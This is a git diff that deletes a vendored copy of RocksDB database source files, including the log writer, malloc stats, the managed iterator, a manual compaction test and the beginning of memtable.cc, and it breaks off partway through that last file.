diff --git a/thirdparty/rocksdb/db/log_writer.cc b/thirdparty/rocksdb/db/log_writer.cc
deleted file mode 100644
index b02eec8..0000000
--- a/thirdparty/rocksdb/db/log_writer.cc
+++ /dev/null
@@ -1,142 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/log_writer.h"
-
-#include <stdint.h>
-#include "rocksdb/env.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-namespace log {
-
-Writer::Writer(unique_ptr<WritableFileWriter>&& dest, uint64_t log_number,
-               bool recycle_log_files, bool manual_flush)
-    : dest_(std::move(dest)),
-      block_offset_(0),
-      log_number_(log_number),
-      recycle_log_files_(recycle_log_files),
-      manual_flush_(manual_flush) {
-  for (int i = 0; i <= kMaxRecordType; i++) {
-    char t = static_cast<char>(i);
-    type_crc_[i] = crc32c::Value(&t, 1);
-  }
-}
-
-Writer::~Writer() { WriteBuffer(); }
-
-Status Writer::WriteBuffer() { return dest_->Flush(); }
-
-Status Writer::AddRecord(const Slice& slice) {
-  const char* ptr = slice.data();
-  size_t left = slice.size();
-
-  // Header size varies depending on whether we are recycling or not.
-  const int header_size =
-      recycle_log_files_ ? kRecyclableHeaderSize : kHeaderSize;
-
-  // Fragment the record if necessary and emit it.  Note that if slice
-  // is empty, we still want to iterate once to emit a single
-  // zero-length record
-  Status s;
-  bool begin = true;
-  do {
-    const int64_t leftover = kBlockSize - block_offset_;
-    assert(leftover >= 0);
-    if (leftover < header_size) {
-      // Switch to a new block
-      if (leftover > 0) {
-        // Fill the trailer (literal below relies on kHeaderSize and
-        // kRecyclableHeaderSize being <= 11)
-        assert(header_size <= 11);
-        dest_->Append(
-            Slice("\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", leftover));
-      }
-      block_offset_ = 0;
-    }
-
-    // Invariant: we never leave < header_size bytes in a block.
-    assert(static_cast<int64_t>(kBlockSize - block_offset_) >= header_size);
-
-    const size_t avail = kBlockSize - block_offset_ - header_size;
-    const size_t fragment_length = (left < avail) ? left : avail;
-
-    RecordType type;
-    const bool end = (left == fragment_length);
-    if (begin && end) {
-      type = recycle_log_files_ ? kRecyclableFullType : kFullType;
-    } else if (begin) {
-      type = recycle_log_files_ ? kRecyclableFirstType : kFirstType;
-    } else if (end) {
-      type = recycle_log_files_ ? kRecyclableLastType : kLastType;
-    } else {
-      type = recycle_log_files_ ? kRecyclableMiddleType : kMiddleType;
-    }
-
-    s = EmitPhysicalRecord(type, ptr, fragment_length);
-    ptr += fragment_length;
-    left -= fragment_length;
-    begin = false;
-  } while (s.ok() && left > 0);
-  return s;
-}
-
-Status Writer::EmitPhysicalRecord(RecordType t, const char* ptr, size_t n) {
-  assert(n <= 0xffff);  // Must fit in two bytes
-
-  size_t header_size;
-  char buf[kRecyclableHeaderSize];
-
-  // Format the header
-  buf[4] = static_cast<char>(n & 0xff);
-  buf[5] = static_cast<char>(n >> 8);
-  buf[6] = static_cast<char>(t);
-
-  uint32_t crc = type_crc_[t];
-  if (t < kRecyclableFullType) {
-    // Legacy record format
-    assert(block_offset_ + kHeaderSize + n <= kBlockSize);
-    header_size = kHeaderSize;
-  } else {
-    // Recyclable record format
-    assert(block_offset_ + kRecyclableHeaderSize + n <= kBlockSize);
-    header_size = kRecyclableHeaderSize;
-
-    // Only encode low 32-bits of the 64-bit log number.  This means
-    // we will fail to detect an old record if we recycled a log from
-    // ~4 billion logs ago, but that is effectively impossible, and
-    // even if it were we'dbe far more likely to see a false positive
-    // on the 32-bit CRC.
-    EncodeFixed32(buf + 7, static_cast<uint32_t>(log_number_));
-    crc = crc32c::Extend(crc, buf + 7, 4);
-  }
-
-  // Compute the crc of the record type and the payload.
-  crc = crc32c::Extend(crc, ptr, n);
-  crc = crc32c::Mask(crc);  // Adjust for storage
-  EncodeFixed32(buf, crc);
-
-  // Write the header and the payload
-  Status s = dest_->Append(Slice(buf, header_size));
-  if (s.ok()) {
-    s = dest_->Append(Slice(ptr, n));
-    if (s.ok()) {
-      if (!manual_flush_) {
-        s = dest_->Flush();
-      }
-    }
-  }
-  block_offset_ += header_size + n;
-  return s;
-}
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/log_writer.h b/thirdparty/rocksdb/db/log_writer.h
deleted file mode 100644
index a3a8799..0000000
--- a/thirdparty/rocksdb/db/log_writer.h
+++ /dev/null
@@ -1,111 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <stdint.h>
-
-#include <memory>
-
-#include "db/log_format.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/status.h"
-
-namespace rocksdb {
-
-class WritableFileWriter;
-
-using std::unique_ptr;
-
-namespace log {
-
-/**
- * Writer is a general purpose log stream writer. It provides an append-only
- * abstraction for writing data. The details of the how the data is written is
- * handled by the WriteableFile sub-class implementation.
- *
- * File format:
- *
- * File is broken down into variable sized records. The format of each record
- * is described below.
- *       +-----+-------------+--+----+----------+------+-- ... ----+
- * File  | r0  |        r1   |P | r2 |    r3    |  r4  |           |
- *       +-----+-------------+--+----+----------+------+-- ... ----+
- *       <--- kBlockSize ------>|<-- kBlockSize ------>|
- *  rn = variable size records
- *  P = Padding
- *
- * Data is written out in kBlockSize chunks. If next record does not fit
- * into the space left, the leftover space will be padded with \0.
- *
- * Legacy record format:
- *
- * +---------+-----------+-----------+--- ... ---+
- * |CRC (4B) | Size (2B) | Type (1B) | Payload   |
- * +---------+-----------+-----------+--- ... ---+
- *
- * CRC = 32bit hash computed over the payload using CRC
- * Size = Length of the payload data
- * Type = Type of record
- *        (kZeroType, kFullType, kFirstType, kLastType, kMiddleType )
- *        The type is used to group a bunch of records together to represent
- *        blocks that are larger than kBlockSize
- * Payload = Byte stream as long as specified by the payload size
- *
- * Recyclable record format:
- *
- * +---------+-----------+-----------+----------------+--- ... ---+
- * |CRC (4B) | Size (2B) | Type (1B) | Log number (4B)| Payload   |
- * +---------+-----------+-----------+----------------+--- ... ---+
- *
- * Same as above, with the addition of
- * Log number = 32bit log file number, so that we can distinguish between
- * records written by the most recent log writer vs a previous one.
- */
-class Writer {
- public:
-  // Create a writer that will append data to "*dest".
-  // "*dest" must be initially empty.
-  // "*dest" must remain live while this Writer is in use.
-  explicit Writer(unique_ptr<WritableFileWriter>&& dest, uint64_t log_number,
-                  bool recycle_log_files, bool manual_flush = false);
-  ~Writer();
-
-  Status AddRecord(const Slice& slice);
-
-  WritableFileWriter* file() { return dest_.get(); }
-  const WritableFileWriter* file() const { return dest_.get(); }
-
-  uint64_t get_log_number() const { return log_number_; }
-
-  Status WriteBuffer();
-
- private:
-  unique_ptr<WritableFileWriter> dest_;
-  size_t block_offset_;       // Current offset in block
-  uint64_t log_number_;
-  bool recycle_log_files_;
-
-  // crc32c values for all supported record types.  These are
-  // pre-computed to reduce the overhead of computing the crc of the
-  // record type stored in the header.
-  uint32_t type_crc_[kMaxRecordType + 1];
-
-  Status EmitPhysicalRecord(RecordType type, const char* ptr, size_t length);
-
-  // If true, it does not flush after each write. Instead it relies on the upper
-  // layer to manually does the flush by calling ::WriteBuffer()
-  bool manual_flush_;
-
-  // No copying allowed
-  Writer(const Writer&);
-  void operator=(const Writer&);
-};
-
-}  // namespace log
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/malloc_stats.cc b/thirdparty/rocksdb/db/malloc_stats.cc
deleted file mode 100644
index 7acca65..0000000
--- a/thirdparty/rocksdb/db/malloc_stats.cc
+++ /dev/null
@@ -1,52 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/malloc_stats.h"
-
-#ifndef ROCKSDB_LITE
-#include <memory>
-#include <string.h>
-
-namespace rocksdb {
-
-#ifdef ROCKSDB_JEMALLOC
-#include "jemalloc/jemalloc.h"
-
-typedef struct {
-  char* cur;
-  char* end;
-} MallocStatus;
-
-static void GetJemallocStatus(void* mstat_arg, const char* status) {
-  MallocStatus* mstat = reinterpret_cast<MallocStatus*>(mstat_arg);
-  size_t status_len = status ? strlen(status) : 0;
-  size_t buf_size = (size_t)(mstat->end - mstat->cur);
-  if (!status_len || status_len > buf_size) {
-    return;
-  }
-
-  snprintf(mstat->cur, buf_size, "%s", status);
-  mstat->cur += status_len;
-}
-#endif  // ROCKSDB_JEMALLOC
-
-void DumpMallocStats(std::string* stats) {
-#ifdef ROCKSDB_JEMALLOC
-  MallocStatus mstat;
-  const unsigned int kMallocStatusLen = 1000000;
-  std::unique_ptr<char[]> buf{new char[kMallocStatusLen + 1]};
-  mstat.cur = buf.get();
-  mstat.end = buf.get() + kMallocStatusLen;
-  je_malloc_stats_print(GetJemallocStatus, &mstat, "");
-  stats->append(buf.get());
-#endif  // ROCKSDB_JEMALLOC
-}
-
-}
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/malloc_stats.h b/thirdparty/rocksdb/db/malloc_stats.h
deleted file mode 100644
index a2f324f..0000000
--- a/thirdparty/rocksdb/db/malloc_stats.h
+++ /dev/null
@@ -1,22 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-namespace rocksdb {
-
-void DumpMallocStats(std::string*);
-
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/managed_iterator.cc b/thirdparty/rocksdb/db/managed_iterator.cc
deleted file mode 100644
index c393eb5..0000000
--- a/thirdparty/rocksdb/db/managed_iterator.cc
+++ /dev/null
@@ -1,262 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/managed_iterator.h"
-
-#include <limits>
-#include <string>
-#include <utility>
-
-#include "db/column_family.h"
-#include "db/db_impl.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "rocksdb/env.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "table/merging_iterator.h"
-
-namespace rocksdb {
-
-namespace {
-// Helper class that locks a mutex on construction and unlocks the mutex when
-// the destructor of the MutexLock object is invoked.
-//
-// Typical usage:
-//
-//   void MyClass::MyMethod() {
-//     MILock l(&mu_);       // mu_ is an instance variable
-//     ... some complex code, possibly with multiple return paths ...
-//   }
-
-class MILock {
- public:
-  explicit MILock(std::mutex* mu, ManagedIterator* mi) : mu_(mu), mi_(mi) {
-    this->mu_->lock();
-  }
-  ~MILock() {
-    this->mu_->unlock();
-  }
-  ManagedIterator* GetManagedIterator() { return mi_; }
-
- private:
-  std::mutex* const mu_;
-  ManagedIterator* mi_;
-  // No copying allowed
-  MILock(const MILock&) = delete;
-  void operator=(const MILock&) = delete;
-};
-}  // anonymous namespace
-
-//
-// Synchronization between modifiers, releasers, creators
-// If iterator operation, wait till (!in_use), set in_use, do op, reset in_use
-//  if modifying mutable_iter, atomically exchange in_use:
-//  return if in_use set / otherwise set in use,
-//  atomically replace new iter with old , reset in use
-//  The releaser is the new operation and it holds a lock for a very short time
-//  The existing non-const iterator operations are supposed to be single
-//  threaded and hold the lock for the duration of the operation
-//  The existing const iterator operations use the cached key/values
-//  and don't do any locking.
-ManagedIterator::ManagedIterator(DBImpl* db, const ReadOptions& read_options,
-                                 ColumnFamilyData* cfd)
-    : db_(db),
-      read_options_(read_options),
-      cfd_(cfd),
-      svnum_(cfd->GetSuperVersionNumber()),
-      mutable_iter_(nullptr),
-      valid_(false),
-      snapshot_created_(false),
-      release_supported_(true) {
-  read_options_.managed = false;
-  if ((!read_options_.tailing) && (read_options_.snapshot == nullptr)) {
-    assert(nullptr != (read_options_.snapshot = db_->GetSnapshot()));
-    snapshot_created_ = true;
-  }
-  cfh_.SetCFD(cfd);
-  mutable_iter_ = unique_ptr<Iterator>(db->NewIterator(read_options_, &cfh_));
-}
-
-ManagedIterator::~ManagedIterator() {
-  Lock();
-  if (snapshot_created_) {
-    db_->ReleaseSnapshot(read_options_.snapshot);
-    snapshot_created_ = false;
-    read_options_.snapshot = nullptr;
-  }
-  UnLock();
-}
-
-bool ManagedIterator::Valid() const { return valid_; }
-
-void ManagedIterator::SeekToLast() {
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    RebuildIterator();
-  }
-  assert(mutable_iter_ != nullptr);
-  mutable_iter_->SeekToLast();
-  if (mutable_iter_->status().ok()) {
-    UpdateCurrent();
-  }
-}
-
-void ManagedIterator::SeekToFirst() {
-  MILock l(&in_use_, this);
-  SeekInternal(Slice(), true);
-}
-
-void ManagedIterator::Seek(const Slice& user_key) {
-  MILock l(&in_use_, this);
-  SeekInternal(user_key, false);
-}
-
-void ManagedIterator::SeekForPrev(const Slice& user_key) {
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    RebuildIterator();
-  }
-  assert(mutable_iter_ != nullptr);
-  mutable_iter_->SeekForPrev(user_key);
-  UpdateCurrent();
-}
-
-void ManagedIterator::SeekInternal(const Slice& user_key, bool seek_to_first) {
-  if (NeedToRebuild()) {
-    RebuildIterator();
-  }
-  assert(mutable_iter_ != nullptr);
-  if (seek_to_first) {
-    mutable_iter_->SeekToFirst();
-  } else {
-    mutable_iter_->Seek(user_key);
-  }
-  UpdateCurrent();
-}
-
-void ManagedIterator::Prev() {
-  if (!valid_) {
-    status_ = Status::InvalidArgument("Iterator value invalid");
-    return;
-  }
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    std::string current_key = key().ToString();
-    Slice old_key(current_key);
-    RebuildIterator();
-    SeekInternal(old_key, false);
-    UpdateCurrent();
-    if (!valid_) {
-      return;
-    }
-    if (key().compare(old_key) != 0) {
-      valid_ = false;
-      status_ = Status::Incomplete("Cannot do Prev now");
-      return;
-    }
-  }
-  mutable_iter_->Prev();
-  if (mutable_iter_->status().ok()) {
-    UpdateCurrent();
-    status_ = Status::OK();
-  } else {
-    status_ = mutable_iter_->status();
-  }
-}
-
-void ManagedIterator::Next() {
-  if (!valid_) {
-    status_ = Status::InvalidArgument("Iterator value invalid");
-    return;
-  }
-  MILock l(&in_use_, this);
-  if (NeedToRebuild()) {
-    std::string current_key = key().ToString();
-    Slice old_key(current_key.data(), cached_key_.Size());
-    RebuildIterator();
-    SeekInternal(old_key, false);
-    UpdateCurrent();
-    if (!valid_) {
-      return;
-    }
-    if (key().compare(old_key) != 0) {
-      valid_ = false;
-      status_ = Status::Incomplete("Cannot do Next now");
-      return;
-    }
-  }
-  mutable_iter_->Next();
-  UpdateCurrent();
-}
-
-Slice ManagedIterator::key() const {
-  assert(valid_);
-  return cached_key_.GetUserKey();
-}
-
-Slice ManagedIterator::value() const {
-  assert(valid_);
-  return cached_value_.GetUserKey();
-}
-
-Status ManagedIterator::status() const { return status_; }
-
-void ManagedIterator::RebuildIterator() {
-  svnum_ = cfd_->GetSuperVersionNumber();
-  mutable_iter_ = unique_ptr<Iterator>(db_->NewIterator(read_options_, &cfh_));
-}
-
-void ManagedIterator::UpdateCurrent() {
-  assert(mutable_iter_ != nullptr);
-
-  valid_ = mutable_iter_->Valid();
-  if (!valid_) {
-    status_ = mutable_iter_->status();
-    return;
-  }
-
-  status_ = Status::OK();
-  cached_key_.SetUserKey(mutable_iter_->key());
-  cached_value_.SetUserKey(mutable_iter_->value());
-}
-
-void ManagedIterator::ReleaseIter(bool only_old) {
-  if ((mutable_iter_ == nullptr) || (!release_supported_)) {
-    return;
-  }
-  if (svnum_ != cfd_->GetSuperVersionNumber() || !only_old) {
-    if (!TryLock()) {  // Don't release iter if in use
-      return;
-    }
-    mutable_iter_ = nullptr;  // in_use for a very short time
-    UnLock();
-  }
-}
-
-bool ManagedIterator::NeedToRebuild() {
-  if ((mutable_iter_ == nullptr) || (status_.IsIncomplete()) ||
-      (!only_drop_old_ && (svnum_ != cfd_->GetSuperVersionNumber()))) {
-    return true;
-  }
-  return false;
-}
-
-void ManagedIterator::Lock() {
-  in_use_.lock();
-  return;
-}
-
-bool ManagedIterator::TryLock() { return in_use_.try_lock(); }
-
-void ManagedIterator::UnLock() {
-  in_use_.unlock();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/managed_iterator.h b/thirdparty/rocksdb/db/managed_iterator.h
deleted file mode 100644
index 8e962f7..0000000
--- a/thirdparty/rocksdb/db/managed_iterator.h
+++ /dev/null
@@ -1,85 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#ifndef ROCKSDB_LITE
-
-#include <mutex>
-#include <queue>
-#include <string>
-#include <vector>
-
-#include "db/column_family.h"
-#include "rocksdb/db.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/options.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-class DBImpl;
-struct SuperVersion;
-class ColumnFamilyData;
-
-/**
- * ManagedIterator is a special type of iterator that supports freeing the
- * underlying iterator and still being able to access the current key/value
- * pair.  This is done by copying the key/value pair so that clients can
- * continue to access the data without getting a SIGSEGV.
- * The underlying iterator can be freed manually through the  call to
- * ReleaseIter or automatically (as needed on space pressure or age.)
- * The iterator is recreated using the saved original arguments.
- */
-class ManagedIterator : public Iterator {
- public:
-  ManagedIterator(DBImpl* db, const ReadOptions& read_options,
-                  ColumnFamilyData* cfd);
-  virtual ~ManagedIterator();
-
-  virtual void SeekToLast() override;
-  virtual void Prev() override;
-  virtual bool Valid() const override;
-  void SeekToFirst() override;
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void Next() override;
-  virtual Slice key() const override;
-  virtual Slice value() const override;
-  virtual Status status() const override;
-  void ReleaseIter(bool only_old);
-  void SetDropOld(bool only_old) {
-    only_drop_old_ = read_options_.tailing || only_old;
-  }
-
- private:
-  void RebuildIterator();
-  void UpdateCurrent();
-  void SeekInternal(const Slice& user_key, bool seek_to_first);
-  bool NeedToRebuild();
-  void Lock();
-  bool TryLock();
-  void UnLock();
-  DBImpl* const db_;
-  ReadOptions read_options_;
-  ColumnFamilyData* const cfd_;
-  ColumnFamilyHandleInternal cfh_;
-
-  uint64_t svnum_;
-  std::unique_ptr<Iterator> mutable_iter_;
-  // internal iterator status
-  Status status_;
-  bool valid_;
-
-  IterKey cached_key_;
-  IterKey cached_value_;
-
-  bool only_drop_old_ = true;
-  bool snapshot_created_;
-  bool release_supported_;
-  std::mutex in_use_;  // is managed iterator in use
-};
-
-}  // namespace rocksdb
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/manual_compaction_test.cc b/thirdparty/rocksdb/db/manual_compaction_test.cc
deleted file mode 100644
index 039b908..0000000
--- a/thirdparty/rocksdb/db/manual_compaction_test.cc
+++ /dev/null
@@ -1,155 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Test for issue 178: a manual compaction causes deleted data to reappear.
-#include <iostream>
-#include <sstream>
-#include <cstdlib>
-
-#include "rocksdb/db.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/write_batch.h"
-#include "util/testharness.h"
-#include "port/port.h"
-
-using namespace rocksdb;
-
-namespace {
-
-const int kNumKeys = 1100000;
-
-std::string Key1(int i) {
-  char buf[100];
-  snprintf(buf, sizeof(buf), "my_key_%d", i);
-  return buf;
-}
-
-std::string Key2(int i) {
-  return Key1(i) + "_xxx";
-}
-
-class ManualCompactionTest : public testing::Test {
- public:
-  ManualCompactionTest() {
-    // Get rid of any state from an old run.
-    dbname_ = rocksdb::test::TmpDir() + "/rocksdb_cbug_test";
-    DestroyDB(dbname_, rocksdb::Options());
-  }
-
-  std::string dbname_;
-};
-
-class DestroyAllCompactionFilter : public CompactionFilter {
- public:
-  DestroyAllCompactionFilter() {}
-
-  virtual bool Filter(int level, const Slice& key, const Slice& existing_value,
-                      std::string* new_value,
-                      bool* value_changed) const override {
-    return existing_value.ToString() == "destroy";
-  }
-
-  virtual const char* Name() const override {
-    return "DestroyAllCompactionFilter";
-  }
-};
-
-TEST_F(ManualCompactionTest, CompactTouchesAllKeys) {
-  for (int iter = 0; iter < 2; ++iter) {
-    DB* db;
-    Options options;
-    if (iter == 0) { // level compaction
-      options.num_levels = 3;
-      options.compaction_style = kCompactionStyleLevel;
-    } else { // universal compaction
-      options.compaction_style = kCompactionStyleUniversal;
-    }
-    options.create_if_missing = true;
-    options.compression = rocksdb::kNoCompression;
-    options.compaction_filter = new DestroyAllCompactionFilter();
-    ASSERT_OK(DB::Open(options, dbname_, &db));
-
-    db->Put(WriteOptions(), Slice("key1"), Slice("destroy"));
-    db->Put(WriteOptions(), Slice("key2"), Slice("destroy"));
-    db->Put(WriteOptions(), Slice("key3"), Slice("value3"));
-    db->Put(WriteOptions(), Slice("key4"), Slice("destroy"));
-
-    Slice key4("key4");
-    db->CompactRange(CompactRangeOptions(), nullptr, &key4);
-    Iterator* itr = db->NewIterator(ReadOptions());
-    itr->SeekToFirst();
-    ASSERT_TRUE(itr->Valid());
-    ASSERT_EQ("key3", itr->key().ToString());
-    itr->Next();
-    ASSERT_TRUE(!itr->Valid());
-    delete itr;
-
-    delete options.compaction_filter;
-    delete db;
-    DestroyDB(dbname_, options);
-  }
-}
-
-TEST_F(ManualCompactionTest, Test) {
-  // Open database.  Disable compression since it affects the creation
-  // of layers and the code below is trying to test against a very
-  // specific scenario.
-  rocksdb::DB* db;
-  rocksdb::Options db_options;
-  db_options.create_if_missing = true;
-  db_options.compression = rocksdb::kNoCompression;
-  ASSERT_OK(rocksdb::DB::Open(db_options, dbname_, &db));
-
-  // create first key range
-  rocksdb::WriteBatch batch;
-  for (int i = 0; i < kNumKeys; i++) {
-    batch.Put(Key1(i), "value for range 1 key");
-  }
-  ASSERT_OK(db->Write(rocksdb::WriteOptions(), &batch));
-
-  // create second key range
-  batch.Clear();
-  for (int i = 0; i < kNumKeys; i++) {
-    batch.Put(Key2(i), "value for range 2 key");
-  }
-  ASSERT_OK(db->Write(rocksdb::WriteOptions(), &batch));
-
-  // delete second key range
-  batch.Clear();
-  for (int i = 0; i < kNumKeys; i++) {
-    batch.Delete(Key2(i));
-  }
-  ASSERT_OK(db->Write(rocksdb::WriteOptions(), &batch));
-
-  // compact database
-  std::string start_key = Key1(0);
-  std::string end_key = Key1(kNumKeys - 1);
-  rocksdb::Slice least(start_key.data(), start_key.size());
-  rocksdb::Slice greatest(end_key.data(), end_key.size());
-
-  // commenting out the line below causes the example to work correctly
-  db->CompactRange(CompactRangeOptions(), &least, &greatest);
-
-  // count the keys
-  rocksdb::Iterator* iter = db->NewIterator(rocksdb::ReadOptions());
-  int num_keys = 0;
-  for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-    num_keys++;
-  }
-  delete iter;
-  ASSERT_EQ(kNumKeys, num_keys) << "Bad number of keys";
-
-  // close database
-  delete db;
-  DestroyDB(dbname_, rocksdb::Options());
-}
-
-}  // anonymous namespace
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/memtable.cc b/thirdparty/rocksdb/db/memtable.cc
deleted file mode 100644
index d51b261..0000000
--- a/thirdparty/rocksdb/db/memtable.cc
+++ /dev/null
@@ -1,925 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/memtable.h"
-
-#include <algorithm>
-#include <limits>
-#include <memory>
-
-#include "db/dbformat.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "monitoring/perf_context_imp.h"
-#include "monitoring/statistics.h"
-#include "port/port.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/internal_iterator.h"
-#include "table/iterator_wrapper.h"
-#include "table/merging_iterator.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-#include "util/coding.h"
-#include "util/memory_usage.h"
-#include "util/murmurhash.h"
-#include "util/mutexlock.h"
-
-namespace rocksdb {
-
-ImmutableMemTableOptions::ImmutableMemTableOptions(
-    const ImmutableCFOptions& ioptions,
-    const MutableCFOptions& mutable_cf_options)
-    : arena_block_size(mutable_cf_options.arena_block_size),
-      memtable_prefix_bloom_bits(
-          static_cast<uint32_t>(
-              static_cast<double>(mutable_cf_options.write_buffer_size) *
-              mutable_cf_options.memtable_prefix_bloom_size_ratio) *
-          8u),
-      memtable_huge_page_size(mutable_cf_options.memtable_huge_page_size),
-      inplace_update_support(ioptions.inplace_update_support),
-      inplace_update_num_locks(mutable_cf_options.inplace_update_num_locks),
-      inplace_callback(ioptions.inplace_callback),
-      max_successive_merges(mutable_cf_options.max_successive_merges),
-      statistics(ioptions.statistics),
-      merge_operator(ioptions.merge_operator),
-      info_log(ioptions.info_log) {}
-
-MemTable::MemTable(const InternalKeyComparator& cmp,
-                   const ImmutableCFOptions& ioptions,
-                   const MutableCFOptions& mutable_cf_options,
-                   WriteBufferManager* write_buffer_manager,
-                   SequenceNumber latest_seq, uint32_t column_family_id)
-    : comparator_(cmp),
-      moptions_(ioptions, mutable_cf_options),
-      refs_(0),
-      kArenaBlockSize(OptimizeBlockSize(moptions_.arena_block_size)),
-      mem_tracker_(write_buffer_manager),
-      arena_(
-          moptions_.arena_block_size,
-          (write_buffer_manager != nullptr && write_buffer_manager->enabled())
-              ? &mem_tracker_
-              : nullptr,
-          mutable_cf_options.memtable_huge_page_size),
-      table_(ioptions.memtable_factory->CreateMemTableRep(
-          comparator_, &arena_, ioptions.prefix_extractor, ioptions.info_log,
-          column_family_id)),
-      range_del_table_(SkipListFactory().CreateMemTableRep(
-          comparator_, &arena_, nullptr /* transform */, ioptions.info_log,
-          column_family_id)),
-      is_range_del_table_empty_(true),
-      data_size_(0),
-      num_entries_(0),
-      num_deletes_(0),
-      write_buffer_size_(mutable_cf_options.write_buffer_size),
-      flush_in_progress_(false),
-      flush_completed_(false),
-      file_number_(0),
-      first_seqno_(0),
-      earliest_seqno_(latest_seq),
-      creation_seq_(latest_seq),
-      mem_next_logfile_number_(0),
-      min_prep_log_referenced_(0),
-      locks_(moptions_.inplace_update_support
-                 ? moptions_.inplace_update_num_locks
-                 : 0),
-      prefix_extractor_(ioptions.prefix_extractor),
-      flush_state_(FLUSH_NOT_REQUESTED),
-      env_(ioptions.env),
-      insert_with_hint_prefix_extractor_(
-          ioptions.memtable_insert_with_hint_prefix_extractor),
-      oldest_key_time_(std::numeric_limits<uint64_t>::max()) {
-  UpdateFlushState();
-  // something went wrong if we need to flush before inserting anything
-  assert(!ShouldScheduleFlush());
-
-  if (prefix_extractor_ && moptions_.memtable_prefix_bloom_bits > 0) {
-    prefix_bloom_.reset(new DynamicBloom(
-        &arena_, moptions_.memtable_prefix_bloom_bits, ioptions.bloom_locality,
-        6 /* hard coded 6 probes */, nullptr, moptions_.memtable_huge_page_size,
-        ioptions.info_log));
-  }
-}
-
-MemTable::~MemTable() {
-  mem_tracker_.FreeMem();
-  assert(refs_ == 0);
-}
-
-size_t MemTable::ApproximateMemoryUsage() {
-  autovector<size_t> usages = {arena_.ApproximateMemoryUsage(),
-                               table_->ApproximateMemoryUsage(),
-                               range_del_table_->ApproximateMemoryUsage(),
-                               rocksdb::ApproximateMemoryUsage(insert_hints_)};
-  size_t total_usage = 0;
-  for (size_t usage : usages) {
-    // If usage + total_usage >= kMaxSizet, return kMaxSizet.
-    // the following variation is to avoid numeric overflow.
